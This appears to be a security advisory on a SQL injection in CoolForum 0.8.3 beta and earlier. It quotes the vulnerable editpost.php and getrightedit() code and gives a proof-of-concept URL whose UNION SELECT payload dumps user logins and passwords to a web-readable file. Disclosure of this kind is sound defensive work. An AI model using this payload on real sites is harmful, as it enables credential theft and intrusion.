Type: SQL Injection
Risk: Critical
Product: CoolForum <= 0.8.3 beta
********************************

Vulnerability
*************
// File: editpost.php
// Line 38 //
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']); else $post = 0;
--
// Line 77 //
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);
--
// File: admin/functions.php
// Line 623 //
function getrightedit($idpost,$forumid)
{
global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;
$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost);
$j = mysql_fetch_array($query);
--

Line 38 casts the request value into $post with intval(), but line 77 passes the raw $_REQUEST['post'] instead of the sanitized $post, and getrightedit() concatenates that value directly into the SQL string without escaping.

Proof Of Concept
****************
http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

Credits
*******
Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt
Note: Other SQL injections exist, but they are difficult to exploit.
by DarkFig